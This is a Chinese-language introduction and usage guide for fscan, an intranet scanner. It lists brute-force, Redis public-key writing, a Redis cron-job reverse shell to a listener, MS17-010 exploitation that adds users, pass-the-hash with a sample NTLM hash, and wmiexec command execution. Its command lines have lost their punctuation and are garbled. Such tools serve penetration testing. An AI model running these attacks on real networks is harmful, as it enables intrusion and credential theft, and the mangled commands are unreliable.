一款内网综合扫描工具

　　工具介绍：
　　一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
　　主要功能：
　　1。信息搜集：存活探测（icmp）端口扫描
　　2。爆破功能：各类服务爆破（ssh、smb、rdp等）数据库密码爆破（mysql、mssql、redis、psql、oracle等）
　　3。系统信息、漏洞扫描：netbios探测、域控识别获取目标网卡信息高危漏洞扫描（ms17010等）
　　4。Web探测功能：webtitle探测web指纹识别（常见cms、oa框架等）web漏洞扫描（weblogic、st2等，支持xray的poc）
　　5。漏洞利用：redis写公钥或写计划任务ssh命令执行ms17017利用（植入shellcode），如添加用户等
　　6。其他功能：文件保存
　　安装使用：
　　简单用法
　　fscan。exeh192。168。1。124（默认使用全部模块）
　　fscan。exeh192。168。1。116（B段扫描）
　　其他使用方法
　　fscan。exeh192。168。1。124npnonopoc（跳过存活检测、不保存文件、跳过webpoc扫描）
　　fscan。exeh192。168。1。124rfidrsa。pub（redis写公钥）
　　fscan。exeh192。168。1。124rs192。168。1。1：6666（redis计划任务反弹shell）
　　fscan。exeh192。168。1。124cwhoami（ssh爆破成功后，命令执行）
　　fscan。exeh192。168。1。124msshp2222（指定模块ssh和端口）
　　fscan。exeh192。168。1。124pwdfpwd。txtuserfusers。txt（加载指定文件的用户名、密码来进行爆破）
　　fscan。exeh192。168。1。124otmp1。txt（指定扫描结果保存路径，默认保存在当前路径）
　　fscan。exeh192。168。1。18（A段的192。x。x。1和192。x。x。254，方便快速查看网段信息）
　　fscan。exeh192。168。1。124msmbpwdpassword（smb密码碰撞）
　　fscan。exeh192。168。1。124mms17010（指定模块）
　　fscan。exehfip。txt（以文件导入）
　　fscan。exeuhttp：baidu。comproxy8080（扫描单个url，并设置http代理http：127。0。0。1：8080）
　　fscan。exeh192。168。1。124nobrnopoc（不进行爆破，不扫Webpoc，以减少流量）
　　fscan。exeh192。168。1。124pa3389（在原基础上，加入3389rdp扫描）
　　fscan。exeh192。168。1。124socks5127。0。0。1：1080（只支持简单tcp功能的代理，部分功能的库不支持设置代理）
　　fscan。exeh192。168。1。124mms17010scadd（内置添加用户等功能，只适用于备选工具，更推荐其他ms17010的专项利用工具）
　　fscan。exeh192。168。1。124msmb2useradminhashxxxxx（pthhash碰撞，xxxx：ntlmhash，如32ed87bdb5fdc5e9cba88547376818d4）
　　fscan。exeh192。168。1。124mwmiexecuseradminpwdpasswordcxxxxx（wmiexec无回显命令执行）
　　运行截图：
　　scan。exeh192。168。x。x（全功能、ms17010、读取网卡信息）